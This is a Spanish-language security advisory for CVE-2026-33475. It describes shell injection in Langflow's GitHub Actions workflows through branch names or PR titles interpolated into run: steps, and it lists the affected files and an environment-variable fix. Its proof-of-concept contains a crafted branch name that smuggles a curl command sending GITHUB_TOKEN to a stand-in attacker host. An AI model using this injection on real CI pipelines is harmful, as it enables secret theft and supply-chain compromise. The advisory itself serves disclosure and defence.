CVE-2026-33475 in langflowinformación

Resumen

Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Una vulnerabilidad de inyección de shell remota no autenticada existe en múltiples flujos de trabajo de GitHub Actions en el repositorio de Langflow antes de la versión 1.9.0. La interpolación no saneada de variables de contexto de GitHub (por ejemplo, `${{ github.head_ref }}`) en los pasos `run:` permite a los atacantes inyectar y ejecutar comandos de shell arbitrarios a través de un nombre de rama o título de solicitud de extracción malicioso. Esto puede llevar a la exfiltración de secretos (por ejemplo, `GITHUB_TOKEN`), manipulación de infraestructura o compromiso de la cadena de suministro durante la ejecución de CI/CD. La versión 1.9.0 parchea la vulnerabilidad. --- ### Detalles Varios flujos de trabajo en `.github/workflows/` y `.github/actions/` referencian variables de contexto de GitHub directamente en comandos de shell `run:`, como: ```yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ``` O: ```yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ``` Dado que `github.head_ref`, `github.event.pull_request.title` y `inputs.*` personalizados pueden contener valores controlados por el usuario, deben tratarse como entrada no confiable. La interpolación directa sin el entrecomillado o saneamiento adecuados conduce a la inyección de comandos de shell. --- ### PoC 1. Bifurcar el repositorio de Langflow 2. Crear una nueva rama con el nombre: ```bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 3. Abrir una solicitud de extracción a la rama principal desde la nueva rama 4. GitHub Actions ejecutará el flujo de trabajo afectado (por ejemplo, `deploy-docs-draft.yml`) 5. El paso `run:` que contiene: ```yaml echo "Branch: ${{ github.head_ref }}" ``` Ejecutará: ```bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ``` 6. El atacante recibe el secreto de CI a través de la URL de exfiltración. --- ### Impacto - Tipo: Inyección de Shell / Ejecución Remota de Código en CI - Alcance: Cualquier bifurcación pública de Langflow con GitHub Actions habilitado - Impacto: Acceso total a secretos de CI (por ejemplo, `GITHUB_TOKEN`), posibilidad de subir etiquetas o imágenes maliciosas, manipular lanzamientos o filtrar datos de infraestructura sensibles --- ### Solución Sugerida Refactorizar los flujos de trabajo afectados para usar variables de entorno y envolverlas en comillas dobles: ```yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ``` Evitar la interpolación directa `${{ ... }}` dentro de `run:` para cualquier valor controlado por el usuario. --- ### Archivos Afectados (Langflow `1.3.4`) - `.github/actions/install-playwright/action.yml` - `.github/workflows/deploy-docs-draft.yml` - `.github/workflows/docker-build.yml` - `.github/workflows/release_nightly.yml` - `.github/workflows/python_test.yml` - `.github/workflows/typescript_test.yml`

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Responsable

GitHub_M

Reservar

2026-03-20

Divulgación

2026-03-24

Estado

Confirmado

Voces

VulDB provides additional information and datapoints for this CVE:

Fuentes

• MITRE
• NVD
• CVE Details